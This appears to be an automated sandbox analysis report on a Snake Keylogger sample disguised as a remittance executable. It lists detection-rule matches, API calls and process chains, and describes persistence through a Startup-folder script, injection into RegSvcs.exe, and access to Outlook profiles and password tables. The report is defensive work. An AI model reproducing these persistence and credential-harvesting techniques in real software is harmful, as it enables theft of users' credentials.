                  Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000007.00000002.4560074410.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, z.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, z.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,6_2_00464EAE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeFile created: C:\Users\user\AppData\Local\Temp\doneJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: z84TTREMITTANCEUSD347_432_63.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.000000000287C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002870000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.000000000303A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeFile read: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: z84TTREMITTANCEUSD347_432_63.exeStatic file information: File size 1275767 > 1048576
                  Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: name.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x139d49
                  Source: z84TTREMITTANCEUSD347_432_63.exeStatic PE information: real checksum: 0xa961f should be: 0x139d49
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02464A2D push eax; ret 3_2_02464962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_024648F8 push eax; ret 3_2_02464912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02464968 push eax; ret 3_2_02464972
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02464978 push eax; ret 3_2_02464982
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246891E pushad ; iretd 3_2_0246891F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02464988 push eax; ret 3_2_02464992
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02468C2F pushfd ; iretd 3_2_02468C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02468DDF push esp; iretd 3_2_02468DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06162DBE pushfd ; retf 3_2_06162DC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06169241 push es; ret 3_2_06169244
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00416CB5 push ecx; ret 6_2_00416CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC9C30 push esp; retf 02BEh7_2_02BC9D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC4A2D push eax; ret 7_2_02BC4962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC48F8 push eax; ret 7_2_02BC4912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC4988 push eax; ret 7_2_02BC4992
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC4978 push eax; ret 7_2_02BC4982
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC4968 push eax; ret 7_2_02BC4972
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (8).png
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_0047A330
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00434418
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
